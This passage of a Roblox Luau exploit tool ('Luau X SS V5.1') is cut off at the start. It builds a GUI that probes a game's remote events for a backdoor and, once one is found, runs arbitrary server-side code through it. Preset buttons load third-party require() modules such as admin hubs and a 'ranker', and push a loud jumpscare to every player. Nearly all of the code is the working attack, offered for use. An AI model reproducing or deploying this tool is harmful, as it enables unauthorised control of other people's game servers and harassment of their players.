), {Position = targetPos}):Play() end end btn1.MouseButton1Click:Connect(function() SlideTo(1) end) btn2.MouseButton1Click:Connect(function() SlideTo(2) end) btn3.MouseButton1Click:Connect(function() SlideTo(3) end) btn4.MouseButton1Click:Connect(function() SlideTo(4) end) btn7.MouseButton1Click:Connect(function() SlideTo(5) end) SlideTo(1) local TextBox = Instance.new("TextBox") TextBox.Size = UDim2.new(0, 645, 0, 189) TextBox.AnchorPoint = Vector2.new(0.5, 0.67) TextBox.Position = UDim2.new(0.5, 0, 0.5, 0) TextBox.BackgroundColor3 = Color3.fromRGB(20, 20, 20) TextBox.BackgroundTransparency = 0.99 TextBox.BorderSizePixel = 1 TextBox.BorderColor3 = Color3.fromRGB(20, 20, 20) TextBox.TextSize = 25 TextBox.Text = "Require(put your id mainmodule).load(\"name\")" TextBox.TextWrapped = true TextBox.TextXAlignment = Enum.TextXAlignment.Left TextBox.TextYAlignment = Enum.TextYAlignment.Top TextBox.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox.Font = Enum.Font.SourceSans TextBox.TextSize = 18 local Corner = Instance.new("UICorner") Corner.CornerRadius = UDim.new(0, 10) Corner.Parent = TextBox local UIStroke = Instance.new("UIStroke") local UIStroke = Instance.new("UIStroke") UIStroke.Thickness = 2 UIStroke.Color = Color3.fromRGB(20, 20, 20) UIStroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border UIStroke.Parent = TextBox TextBox.ClearTextOnFocus = false TextBox.Parent = Frame2 local alphabet = {'a','b','c','d','e','f','g','h','i','j','k','l', 'm','n','o','p','q','r','s','t','u','v','w','x','y','z', 'A','B','C','D','E','F','G','H','I','J','K','L','M','N', 'O','P','Q','R','S','T','U','V','W','X','Y','Z'} local HttpService = game:GetService("HttpService") local searching = false local backdoorRemote = nil local function generateName(length) local text = '' for i = 1, length do text = text .. alphabet[math.random(1, #alphabet)] end return text end local function runRemote(remote, data) if remote:IsA('RemoteEvent') then remote:FireServer(data) elseif remote:IsA('RemoteFunction') then spawn(function() remote:InvokeServer(data) end) end end local function findBackdoor() local timeStart = os.clock() local remotes = {} local protected_backdoor = game:GetService('ReplicatedStorage'):FindFirstChild('lh'..game.PlaceId/6666*1337*game.PlaceId) if protected_backdoor and protected_backdoor:IsA('RemoteFunction') then local code = generateName(math.random(12,30)) spawn(function() protected_backdoor:InvokeServer('lalol hub scanner', "a=Instance.new('Model',workspace)a.Name='"..code.."'") end) remotes[code] = protected_backdoor end for _, remote in ipairs(game:GetDescendants()) do if not (remote:IsA('RemoteEvent') or remote:IsA('RemoteFunction')) then continue end if string.split(remote:GetFullName(), '.')[1] == 'RobloxReplicatedStorage' then continue end if remote.Parent == game:GetService("ReplicatedStorage") or remote.Parent.Parent == game:GetService("ReplicatedStorage") then if remote:FindFirstChild('__FUNCTION') or remote.Name == '__FUNCTION' then continue end if remote.Parent.Parent.Name == 'HDAdminClient' and remote.Parent.Name == 'Signals' then continue end if remote.Parent.Name == 'DefaultChatSystemChatEvents' then continue end end local code = generateName(math.random(12,30)) runRemote(remote, "a=Instance.new('Model',workspace)a.Name='"..code.."'") remotes[code] = remote end for i = 1, 50 do for code, remote in pairs(remotes) do if workspace:FindFirstChild(code) then local timeTaken = os.clock() - timeStart backdoorRemote = remote CreateNotification("Success!", "BACKDOOR FOUND! " .. timeTaken .. "s\n" .. remote:GetFullName(), "Success", 5) runRemote(backdoorRemote, "a=Instance.new('Hint',workspace)while true do a.Text='Luau X SS V5.1 rework by gojohdkaisenkt|faster and free' b=1,1 do a.Parent=workspace;wait(1)a.Parent=workspace;wait(0.5)end;wait(60)end") return true end end wait(0.1) end CreateNotification("Error!", "No backdoor found :(", "Error", 5) return false end local function executeScript() local scriptText = TextBox.Text if scriptText and scriptText ~= "" then local success, err = pcall(function() if not backdoorRemote then error("No backdoorRemote found! Please scan first.") end runRemote(backdoorRemote, scriptText) end) if success then CreateNotification("Success!", "execute", "Success", 5) else CreateNotification("Error!", tostring(err), "Error", 5) end else CreateNotification("Error!", "please put your script", "Error", 5) end end local Button1 = Instance.new("TextButton") Button1.Size = UDim2.new(0, 40, 0, 40) Button1.Position = UDim2.new(0.01, 0, 0.82, 0) Button1.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Button1.BackgroundTransparency = 0.99 Button1.BorderSizePixel = 0 Button1.Text = "" Button1.Parent = Frame2 Button1.MouseButton1Click:Connect(executeScript) local Corner1 = Instance.new("UICorner") Corner1.CornerRadius = UDim.new(0, 5) Corner1.Parent = Button1 local Stroke1 = Instance.new("UIStroke") Stroke1.Thickness = 2 Stroke1.Color = Color3.fromRGB(20, 20, 20) Stroke1.ApplyStrokeMode = Enum.ApplyStrokeMode.Border Stroke1.Parent = Button1 local Img1 = Instance.new("ImageLabel") Img1.Size = UDim2.new(0.6, 0, 0.6, 0) Img1.AnchorPoint = Vector2.new(0.5, 0.5) Img1.Position = UDim2.new(0.5, 0, 0.5, 0) Img1.BackgroundTransparency = 1 Img1.Image = "rbxassetid://84159029790324" Img1.Parent = Button1 local Button2 = Instance.new("TextButton") Button2.Size = UDim2.new(0, 40, 0, 40) Button2.Position = UDim2.new(0.1, 0, 0.82, 0) Button2.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Button2.BackgroundTransparency = 0.99 Button2.BorderSizePixel = 0 Button2.Text = "" Button2.Parent = Frame2 Button2.MouseButton1Click:Connect(function() TextBox.Text = "" end) local Corner2 = Instance.new("UICorner") Corner2.CornerRadius = UDim.new(0, 5) Corner2.Parent = Button2 local Stroke2 = Instance.new("UIStroke") Stroke2.Thickness = 2 Stroke2.Color = Color3.fromRGB(20, 20, 20) Stroke2.ApplyStrokeMode = Enum.ApplyStrokeMode.Border Stroke2.Parent = Button2 local Img2 = Instance.new("ImageLabel") Img2.Size = UDim2.new(0.6, 0, 0.6, 0) Img2.AnchorPoint = Vector2.new(0.5, 0.5) Img2.Position = UDim2.new(0.5, 0, 0.5, 0) Img2.BackgroundTransparency = 1 Img2.Image = "rbxassetid://105955025341798" Img2.Parent = Button2 local Button3 = Instance.new("TextButton") Button3.Size = UDim2.new(0, 40, 0, 40) Button3.Position = UDim2.new(0.1908, 0, 0.82, 0) Button3.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Button3.BackgroundTransparency = 0.99 Button3.BorderSizePixel = 0 Button3.Text = "" Button3.Parent = Frame2 local Corner3 = Instance.new("UICorner") Corner3.CornerRadius = UDim.new(0, 5) Corner3.Parent = Button3 local Stroke3 = Instance.new("UIStroke") Stroke3.Thickness = 2 Stroke3.Color = Color3.fromRGB(20, 20, 20) Stroke3.ApplyStrokeMode = Enum.ApplyStrokeMode.Border Stroke3.Parent = Button3 local Img3 = Instance.new("ImageLabel") Img3.Size = UDim2.new(0.6, 0, 0.6, 0) Img3.AnchorPoint = Vector2.new(0.5, 0.5) Img3.Position = UDim2.new(0.5, 0, 0.5, 0) Img3.BackgroundTransparency = 1 Img3.Image = "rbxassetid://99625725727957" Img3.Parent = Button3 Button3.MouseButton1Click:Connect(function() if not searching then searching = true findBackdoor() searching = false end end) local Skull = Instance.new("ScrollingFrame") Skull.Size = UDim2.new(1, 0, 1, 0) Skull.Position = UDim2.new(0, 0, -0.0007, 0) Skull.CanvasSize = UDim2.new(0, 0, 0, 0) Skull.ScrollBarThickness = 0 Skull.ScrollingDirection = Enum.ScrollingDirection.Y Skull.BackgroundTransparency = 0.99 Skull.Parent = Frame3 Scroll.ClipsDescendants = false local UIListLayoutl = Instance.new("UIListLayout") UIListLayoutl.Parent = Skull UIListLayoutl.Padding = UDim.new(0, 5) UIListLayoutl.SortOrder = Enum.SortOrder.LayoutOrder UIListLayoutl:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function() Skull.CanvasSize = UDim2.new(0, 0, 0, UIListLayoutl.AbsoluteContentSize.Y) end) local Title1 = Instance.new("TextLabel") Title1.Size = UDim2.new(1, -10, 0, 40) Title1.BackgroundTransparency = 1 Title1.Text = "all best require script" Title1.Font = Enum.Font.GothamBold Title1.TextSize = 28 Title1.TextColor3 = Color3.fromRGB(255, 255, 255) Title1.LayoutOrder = 1 Title1.Parent = Skull Title1.LayoutOrder = 1 local Subtitle1 = Instance.new("TextLabel") Subtitle1.Size = UDim2.new(1, -10, 0, 25) Subtitle1.BackgroundTransparency = 1 Subtitle1.Text = "please scan backdoored before use script" Subtitle1.Font = Enum.Font.Gotham Subtitle1.TextSize = 18 Subtitle1.TextColor3 = Color3.fromRGB(200, 200, 200) Subtitle1.TextWrapped = true Subtitle1.LayoutOrder = 2 Subtitle1.Parent = Skull Subtitle1.LayoutOrder = 1 function execute(s) if not s or s == "" then if CreateNotification then CreateNotification("Error!", "Please provide a script", "Error", 5) end return end local success, err = pcall(function() if not backdoorRemote then error("No backdoorRemote found! Please scan first.") end runRemote(backdoorRemote, s) end) if success then if CreateNotification then CreateNotification("Success!", "Executed script", "Success", 5) end else if CreateNotification then CreateNotification("Error!", tostring(err), "Error", 5) end end end local buttonNames = { "Polaria", "happy hub SS", "aureus v1", "jumpscare", "anti skids", "HD RANKER", "sensetion hub", "client replication", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon", "soon" } local buttonFunctions = { ["Polaria"] = function() execute('require(123255432303221):Pload("' .. game.Players.LocalPlayer.Name .. '")') end, ["happy hub SS"] = function() execute('require(78790302691160):Hload("' .. game.Players.LocalPlayer.Name .. '")') end, ["aureus v1"] = function() execute('require(6036737823).CrackedByIncreaseron("' .. game.Players.LocalPlayer.Name .. '")') end, ["jumpscare"] = function() execute("for _,p in pairs(game.Players:GetPlayers()) do local gui=Instance.new('ScreenGui') gui.Name='JumpScareGUI' gui.ResetOnSpawn=false gui.Parent=p:FindFirstChildOfClass('PlayerGui') local img=Instance.new('ImageLabel') img.Size=UDim2.new(1,0,1,0) img.Position=UDim2.new(0,0,0,0) img.BackgroundTransparency=1 img.Image='rbxassetid://103306305577320' img.ImageTransparency=1 img.Parent=gui local sound=Instance.new('Sound') sound.SoundId='rbxassetid://6129291390' sound.Volume=5 sound.Parent=gui sound:Play() game:GetService('TweenService'):Create(img,TweenInfo.new(0.2),{ImageTransparency=0}):Play() spawn(function() for j=1,100 do if img and img.Parent then img.Position=UDim2.new(0,math.random(-10,10),0,math.random(-10,10)) wait(0.01) end end img.Position=UDim2.new(0,0,0,0) end) delay(6,function() if img and img.Parent then game:GetService('TweenService'):Create(img,TweenInfo.new(0.3),{ImageTransparency=1}):Play() end wait(2) if gui and gui.Parent then gui:Destroy() end end) end") end, ["anti skids"] = function() execute("require(10304477576).AntiSkid('"..game.Players.LocalPlayer.Name.."')") end, ["HD RANKER"] = function() execute("require(7192763922).load('"..game.Players.LocalPlayer.Name.."')") end, ["sensetion hub"] = function() execute("require(100263845596551)('"..game.Players.LocalPlayer.Name.."')") end, ["client replication"] = function() execute("require(9978015219).filteringdisabled('"..game.Players.LocalPlayer.Name.."')") end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end, ["soon"] = function() end } for _, name in ipairs(buttonNames) do local btn = Instance.new("TextButton") btn.Name = name btn.Text = "" btn.Size = UDim2.new(1, 0, 0, 43) btn.BackgroundColor3 = Color3.fromRGB(50, 50, 60) btn.Parent = Skull Instance.new("UICorner", btn).CornerRadius = UDim.new(0, 8) btn.LayoutOrder = 1 btn.BackgroundTransparency = 0.99 local S = Instance.new("UIStroke") S.Thickness = 2 S.Color = Color3.fromRGB(20, 20, 20) S.ApplyStrokeMode = Enum.ApplyStrokeMode.Border S.Parent = btn local lbl = Instance.new("TextLabel") lbl.Name = name .. "_Label" lbl.Text = name lbl.Size = UDim2.new(1, -10, 1, 0) lbl.BackgroundTransparency = 1 lbl.TextColor3 = Color3.new(1, 1, 1) lbl.Font = Enum.Font.Gotham lbl.TextSize = 16 lbl.TextXAlignment = Enum.TextXAlignment.Left lbl.TextYAlignment = Enum.TextYAlignment.Center lbl.Parent = btn local padding = Instance.new("UIPadding", lbl) padding.PaddingLeft = UDim.new(0, 10) local func = buttonFunctions[name] if func then btn.MouseButton1Click:Connect(func) else btn.MouseButton1Click:Connect(function() print("fucking btn no function") end) end end local Title10 = Instance.new("TextLabel") Title10.Size = UDim2.new(1, 0, 1, 0) Title10.BackgroundTransparency = 1 Title10.Text = "Coming soon" Title10.Font = Enum.Font.GothamBold Title10.TextSize = 28 Title10.TextColor3 = Color3.fromRGB(255, 255, 255) Title10.LayoutOrder = 1 Title10.Parent = Frame4 Title10.LayoutOrder = 1 Title10.Position = UDim2.new(0, 0, -0.0007, 0) local p = Instance.new("TextLabel") p.Size = UDim2.new(1, -10, 0, 25) p.AutomaticSize = Enum.AutomaticSize.Y p.BackgroundTransparency = 1 p.Text = "i'm sorry admin it's not finished yet because i'm quite lazy and have to release it very soon so it's not finished yet i will try my best to finish it, thanks for using it :)\n\n-gojohdkaisenkt" p.Font = Enum.Font.Gotham p.TextSize = 18 p.TextColor3 = Color3.fromRGB(200, 200, 200) p.TextWrapped = true p.TextXAlignment = Enum.TextXAlignment.Left p.TextYAlignment = Enum.TextYAlignment.Top p.Parent = Title10 p.Position = UDim2.new(0, 0, 0.56, 0) local Tle10 = Instance.new("TextLabel") Tle10.Size = UDim2.new(1, -10, 0, 40) Tle10.BackgroundTransparency = 1 Tle10.Text = "Settings" Tle10.Font = Enum.Font.GothamBold Tle10.TextSize = 28 Tle10.TextColor3 = Color3.fromRGB(255, 255, 255) Tle10.Parent = Frame5 Tle10.Position = UDim2.new(-0.4, 0, 0, 0) local p1 = Instance.new("TextLabel") p1.Size = UDim2.new(1, -10, 0, 25) p1.BackgroundTransparency = 1 p1.Text = "Debug" p1.Font = Enum.Font.Gotham p1.TextSize = 18 p1.TextColor3 = Color3.fromRGB(200, 200, 200) p1.TextWrapped = true p1.TextXAlignment = Enum.TextXAlignment.Left p1.TextYAlignment = Enum.TextYAlignment.Top p1.Parent = Frame5 p1.Position = UDim2.new(0.019, 0, 0.15, 0) local TweenService = game:GetService("TweenService") local toggleFrame = Instance.new("Frame") toggleFrame.Size = UDim2.new(0, 60, 0, 30) toggleFrame.Position = UDim2.new(0.019, 0, 0.23, 0) toggleFrame.BackgroundColor3 = Color3.fromRGB(180, 180, 180) toggleFrame.Parent = Frame5 toggleFrame.ClipsDescendants = true toggleFrame.Name = "SmallToggle" local Strok1 = Instance.new("UIStroke") Strok1.Thickness = 2 Strok1.Color = Color3.fromRGB(20, 20, 20) Strok1.ApplyStrokeMode = Enum.ApplyStrokeMode.Border Strok1.Parent = toggleFrame local knob = Instance.new("Frame") knob.Size = UDim2.new(0, 26, 0, 26) knob.Position = UDim2.new(0, 2, 0, 2) knob.BackgroundColor3 = Color3.fromRGB(255, 255, 255) knob.BorderSizePixel = 0 knob.Parent = toggleFrame toggleFrame.BackgroundTransparency = 1 knob.BackgroundTransparency = 0 local corner1 = Instance.new("UICorner") corner1.CornerRadius = UDim.new(1,0) corner1.Parent = toggleFrame local corner2 = Instance.new("UICorner") corner2.CornerRadius = UDim.new(1,0) corner2.Parent = knob local btn = Instance.new("TextButton") btn.Size = UDim2.new(1, 0, 1, 0) btn.BackgroundTransparency = 1 btn.Text = "" btn.Parent = toggleFrame local isOn = false local function updateToggle(state) isOn = state local goal = {} if state then goal.Position = UDim2.new(1, -28, 0, 2) TweenService:Create(toggleFrame, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(20,20,20)}):Play() else goal.Position = UDim2.new(0, 2, 0, 2) TweenService:Create(toggleFrame, TweenInfo.new(0.2), {BackgroundColor3 = Color3.fromRGB(20,20,20)}):Play() end TweenService:Create(knob, TweenInfo.new(0.2), goal):Play() end btn.MouseButton1Click:Connect(function() updateToggle(not isOn) if isOn then local on = "67 is tuff👍😓" print(on) else local l = " suckskidsLOL" end end) updateToggle(false) local Strok1 = Instance.new("UIStroke") Strok1.Thickness = 2 Strok1.Color = Color3.fromRGB(20, 20, 20) Strok1.Parent = toggleFrame local Strok10 = Instance.new("UIStroke") Strok10.Thickness = 2 Strok10.Color = Color3.fromRGB(20, 20, 20) Strok10.Parent = knob toggleFrame.BackgroundTransparency = 1 knob.BackgroundTransparency = 1